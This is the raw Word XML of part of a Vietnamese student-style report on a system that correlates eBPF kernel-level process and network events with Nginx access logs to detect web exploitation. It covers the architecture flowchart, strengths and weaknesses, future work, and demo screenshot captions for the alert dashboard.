                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:2432308;top:1037898;height:1094700;width:0;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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DgQiq2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Shape 67" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:977121;top:1218877;height:457605;width:1661009;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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0jBj/r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Response</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Shape 68" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:1014759;top:3828820;height:599525;width:1418345;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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L18xmXAAAAA3A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v:fill on="f" focussize="0,0"/>
                  <v:stroke on="f"/>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Response</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Shape 69" o:spid="_x0000_s1026" o:spt="3" type="#_x0000_t3" style="position:absolute;left:8155016;top:228899;height:736599;width:1279680;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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AUx9va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 xml:space="preserve">  Start</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 70" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:7766823;top:2796299;height:636900;width:2070000;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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LX9N6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Đọc access Log</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 71" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:7766754;top:1390588;height:999905;width:2070071;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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EIz6H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 xml:space="preserve">eBPF Agent kích hoạt </w:t>
                        </w:r>
                      </w:p>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Web Log Analyzer</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 72" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:7766823;top:4050174;height:636900;width:2070000;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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M6x8A78AAADc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Filter theo timestamp</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 73" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:7766823;top:5455649;height:636900;width:2070000;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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zg2Zi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center"/>
                          <w:rPr>
                            <w:sz w:val="22"/>
                            <w:szCs w:val="22"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="22"/>
                            <w:szCs w:val="22"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t>Hiển thị</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 74" o:spid="_x0000_s1026" o:spt="3" type="#_x0000_t3" style="position:absolute;left:8249516;top:6709549;height:736500;width:1104600;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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gTV3EvgAAANw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pPr>
                          <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:sz w:val="22"/>
                            <w:szCs w:val="22"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="22"/>
                            <w:szCs w:val="22"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  End</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:8801816;top:965399;height:425700;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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kdeGW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8799230;top:2403144;height:393021;width:2972;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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b04BG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v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:8801823;top:3433199;height:617100;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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ybhFir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8801823;top:4687074;height:768600;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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OWrb/bwAAADc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v:fill on="f" focussize="0,0"/>
                  <v:stroke color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:8801823;top:6092549;height:617100;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Ymfma9AAAA3A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v:fill on="f" focussize="0,0"/>
                  <v:stroke color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <w10:wrap type="none"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="68" w:name="_Toc1251950071"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ xử lý thành phần mở rộng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khi Client gửi một HTTP Request đến Web Server thông qua cổng 8080, request trước tiên được tiếp nhận bởi Nginx Reverse Proxy. Nginx sau đó chuyển tiếp request đến Flask App thông qua mạng nội bộ Docker trên cổng 5000. Sau khi Flask xử lý request và trả về HTTP Response, Nginx chuyển response ngược lại cho Client. Trong quá trình xử lý, Nginx đồng thời ghi nhận các thông tin của request và response vào Access Log, chẳng hạn như thời gian truy cập, địa chỉ IP, phương thức HTTP, URL, mã trạng thái, kích thước response, User-Agent và thời gian xử lý request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Access Log đóng vai trò là nguồn dữ liệu ở tầng ứng dụng Web. Thành phần Web Log Analyzer đọc và phân tích các log này để xác định những request HTTP xảy ra trong khoảng thời gian liên quan đến một event được phát hiện bởi eBPF. Thay vì phân tích toàn bộ log mỗi lần có sự kiện, hệ thống sử dụng timestamp của event eBPF làm mốc và tìm kiếm các request trong một khoảng thời gian nhất định xung quanh event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_heading=h.vt2cfsqfrbus" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkStart w:id="70" w:name="_Toc2046934737"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Đánh giá</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_heading=h.ctvqirmcsxgk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkStart w:id="72" w:name="_Toc1313647928"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ưu điểm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hệ thống có ưu điểm nổi bật ở khả năng kết hợp giám sát hành vi ở mức kernel bằng eBPF:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khả năng phát hiện hành vi nhanh: eBPF thực hiện giám sát trực tiếp tại kernel, do đó có khả năng ghi nhận gần như ngay lập tức các hành vi của tiến trình. Đây là ưu điểm quan trọng đối với các hệ thống phòng thủ, trong đó thời gian từ khi hành vi bất thường xảy ra đến khi phát hiện có ảnh hưởng trực tiếp đến khả năng phản ứng với cuộc tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quan sát được nhiều hành vi hệ thống: có khả năng thu thập được các hành vi như thực hiện tiến trình và shell, truy cập file, cũng như kết nối mạng. Các thông tin này giúp phát hiện những dấu hiệu thường xuất hiện trong quá trình khai thác Web. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Kết hợp các thông tin truy cập ở tần Web thông qua Nginx Access Log: cung cấp thông tin về HTTP request như địa chỉ IP, phương thức HTTP, URL, thời gian truy cập, mã trạng thái và các thông tin liên quan. Khi được kết hợp với event từ eBPF, dữ liệu Web log giúp cung cấp thêm ngữ cảnh cho hành vi được phát hiện, hỗ trợ quá trình điều tra và truy vết nguồn gốc của hành vi bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiến trúc sử dụng Docker Compose và các thành phần độc lập giúp hệ thống dễ triển khai và mở rộng. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_heading=h.8cuqraql2ryr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkStart w:id="74" w:name="_Toc1334559119"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khuyết điểm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chưa phân tích được chuỗi hành vi: hệ thống hiện tại đánh giá dựa trên từng event riêng lẻ. Mặc dù các event có thể được hiển thị theo thời gian và quan hệ tiến trình, hệ thống chưa xây dựng được cơ chế phân tích một chuỗi hành vi hoàn chỉnh để xác định một cuộc tấn công theo từng giai đoạn. Do đó, việc đánh giá mức độ nguy hiểm và mối liên hệ giữa các hành vi vẫn phụ thuộc tương đối nhiều vào khả năng phân tích của người giám sát. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Vì đặc thù eBPF giám sát trực tiếp từ kernel nên có khả năng phát hiện rất nhanh, nhưng đi đôi với đó là mất đi khả năng giám sát quá trình hoạt động của tiến trình đó.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Mối quan hệ giữa eBPF Agent và Web log analyzer vẫn chỉ dựa vào timestamp, chưa thực sự phân tích sâu vào mối quan hệ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_heading=h.ofmolmbiwhmv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkStart w:id="76" w:name="_Toc2095054617"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hướng phát triển</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Nâng cao khả năng phân tích web log: phát triển thêm các chức năng tìm kiếm, bộ lọc nâng cao, …</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Phân tích chuỗi hành vi: xây dựng cơ chế gom nhóm nhiều event thành một chuỗi hành vi, từ đó đánh giá toàn bộ quá trình thay vì đánh giá từng event độc lập.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Phát triển các cơ chế đánh giá và phản ứng tự động.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_heading=h.v2hyfraz14u6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkStart w:id="78" w:name="_Toc1041620708"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Demo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_heading=h.qqg3mwdgioch" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkStart w:id="80" w:name="_Toc541391065"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Các cửa sổ chính</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Web: nơi có thể nhập trực tiếp shell và được hiển thị kết quả trực tiếp lên giao diện web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="2374900"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="158" name="image4.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="158" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="23749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7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="81" w:name="_Toc893575897"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - giao diện web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Giao diện chính của hệ thống:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="3251200"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="159" name="image11.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="159" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="32512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8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="82" w:name="_Toc1624649147"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo-giao diện chính của hệ thống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thành phần Live Events: chứa thông tin events liên tục.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="2349500"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="160" name="image9.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="160" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="23495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9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="83" w:name="_Toc218585403"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần live events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thành phần Alerts View: nơi hiển thị các events được xem là nguy hiểm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="2044700"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="161" name="image8.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="161" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="20447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10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="84" w:name="_Toc674138236"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần Alerts View</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Event Detail: nơi chứa thông tin chi tiết của event được click.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="2349500"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="162" name="image3.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="162" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="23495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11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="85" w:name="_Toc675404875"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần event detail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chức năng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép ngưng hiển thị các event không cần thiết phải xem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
